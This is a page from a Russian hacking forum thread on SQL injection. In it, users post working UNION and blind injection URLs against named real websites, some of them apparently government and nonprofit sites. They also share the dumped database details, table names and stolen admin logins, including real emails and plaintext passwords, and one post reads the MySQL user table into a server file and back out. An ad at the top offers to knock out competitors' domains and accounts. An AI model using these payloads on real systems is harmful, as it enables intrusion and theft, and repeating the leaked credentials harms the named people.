Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 954 из 1242

954

Опции темы

Поиск в этой теме

Опции просмотра

#9531

26.05.2009, 10:28

pelligrim

Познающий

Регистрация: 26.04.2008

Сообщений: 31

Провел на форуме:
31474

Репутация: 53

Код HTML:

http://www.cra.qc.ca/newsarticle.php?id=72+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13/*

4.0.16-standard
gccdb
gccdb@localhost

2.

Код HTML:

http://www.reline.ru/cgi-bin/show_jurid.pl?city=msk&id=-75+union+select+1,2,version(),database(),user(),6+from+users--

4.1.21
db00011932
root@localhost

3. Швейцарские часы

Код HTML:

http://www.luxwatch.ru/view_statia.phtml?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/*

5.0.27-log:bestwatch:bestwatch@localhost

интересные таблицы:
qqwatch:users
mysql:user
mysql:db
bestwatch:ssp2g_admins

Цитата:

http://www.luxwatch.ru/view_statia.phtml?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword),6+from+bestwatch.ssp2g_admins/*
bestwatch:watchbusiness

#9532

26.05.2009, 10:28

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

[PR 6]

Код:

http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

5.0.77-community:manomet_whsrn:manomet_whsrn@localhost

Код:

http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,group_concat(table_name),28+from+information_schema.tables
http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,group_concat(column_name),28+from+information_schema.columns+where+table_name=0x7573657273
http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,email,level,name,password),28+from+users+limit+x,1

email:level:name:password

Цитата:

gavin@sharkcomm.com:10:Gavin Schmidt:itworks
anthony@sharkcomm.com:10:Anthony Arsenault:shaggy69
cduncan@manomet.org:10:Charles Duncan:site-admin!

#9533

26.05.2009, 10:59

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Blind

http://12info.ru./modules/catalog/product.php?id=101+and+substring(version(),1,1)=4--

#9534

26.05.2009, 11:38

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

http://baikal-iwf.ru/main/bar.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5

5.0.67-log:u15196@10.10.153.195:u15196_3

http://baikal-iwf.ru/main/bar.php?id=-8+union+select+1,2,concat_ws(0x3a,email,username,p assword,accesslevel),4,5+from+users

baikal@mail.ru:baikal:baikal:0

PR 2, ТИЦ 20

----------------------

http://www.wamza.com/bar.php?id=-10042+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6,7,8,9,10,11,12,13,14,15,16, 16,18,19,20,21,22,23,24

5.0.45:wamza@your-choice-realty.com:wamza

http://www.wamza.com/bar.php?id=-10042+union+select+1,2,3,concat_ws(0x3a,username,p assword),5,6,7,8,9,10,11,12,13,14,15,16,16,18,19,2 0,21,22,23,24+from+users

PR 2

----------------------

http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,concat_ws(0x3a ,version(),useR(),database()),4,5

5.0.32-Debian_7etch10-log:hnk@localhost:hnk

таблицы:
http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,table_name,4,5 +from+information_schema.tables

поля таблицы users
http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,column_name,4, 5+from+information_schema.columns+where+table_name =0x7573657273

http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,concat_ws(0x3a ,user_id,type,first_name,last_name,email,login,pas sword),4,5+from+users

4:A:Zlatko:Vidackovic:zlatko:monografija

Последний раз редактировалось AlexSatter; 26.05.2009 в 13:59..

#9535

26.05.2009, 14:01

~~Scorpion.~~

Banned

Регистрация: 25.05.2009

Сообщений: 5

Провел на форуме:
29818

Репутация: 5

Скуль:

Код:

http://www.tsekh.ru/prepod.php?id=-3+union+select+1,2,3,4,5,6--

Version()

Код:

http://www.tsekh.ru/prepod.php?id=-3+union+select+version(),2,3,4,5,6--

4.1.22 =(
infa:

Код:

http://www.tsekh.ru/prepod.php?id=-3+union+select+concat_ws(0x3a,user(),database()),2,3,4,5,6--

User() aktzal_mysql@212.193.240.132
Database() aktzal_tsekh

#9536

26.05.2009, 14:30

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

http://dokuzpara.dagschool.com/novosti.php?id=-902+union+select+1,concat_ws(0x3a,version(),useR() ,database()),3,4,5

4.1.22-log:izberg@localhost:wwwizbergru

#9537

26.05.2009, 14:49

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

в добавок к dokuzpara.dagschool.com

основной сайт так же уязвим:

http://dagschool.com/news.php?id=139+and+substring(version(),1,1)=4--

админка: http://dagschool.com/admin/

PR 4

Последний раз редактировалось AlexSatter; 26.05.2009 в 14:53..

#9538

26.05.2009, 16:58

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

ТИЦ: 100
PR: 4
какой то там торрент))

http://baratro.ru/details.php?id=-30051'+union+select+1,2,version(),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19/*

5.0.45

http://baratro.ru/details.php?id=-30051'+union+select+1,2,group_concat(table_name),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+info rmation_sche ma.tables+group+by+table_schema+limit+ 1,1/*

categories,comments,description,torrents,ban

#9539

26.05.2009, 17:22

udman

Постоянный

Регистрация: 21.04.2009

Сообщений: 321

Провел на форуме:
785842

Репутация: 239

Цитата:

http://gorod.ck.ua/pages/ru/news_view.php?id=-4454+UNION+SELECT+0,1,2,3,4,5,concat_ws(0x0b,use r(),vers ion(),database()),7,8+--+&sub=31

gorod@localhost
5.1.16-beta
gorod

#9540

26.05.2009, 17:34

InFlame

Участник форума

Регистрация: 27.10.2008

Сообщений: 215

Провел на форуме:
810079

Репутация: 90

Site: old.yangsan.go.kr

Database info: yangsan@localhost::yangsan::4.0.23-standard-log
http://old.yangsan.go.kr/yangsan-city/sub_1doc/news/toogo/view.php?id=-1074+union+select+1,2,3,4,concat_ws(0x3a3a,user(), database(),version()),6,7,8,9,10,11,12,13,14

Запись в файл:
http://old.yangsan.go.kr/yangsan-city/sub_1doc/news/toogo/view.php?id=-1074+union+select+1,2,3,4,concat_ws(0x3a,user,pass word),6,7,8,9,10,11,12,13,14+from+mysql.user+into+ outfile+'/tmp/mysql.user'

Чтение из файла:
http://old.yangsan.go.kr/yangsan-city/sub_1doc/news/toogo/view.php?id=-1074+union+select+1,2,3,4,load_file('/tmp/mysql.user'),6,7,8,9,10,11,12,13,14

Страница 954 из 1242

954

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход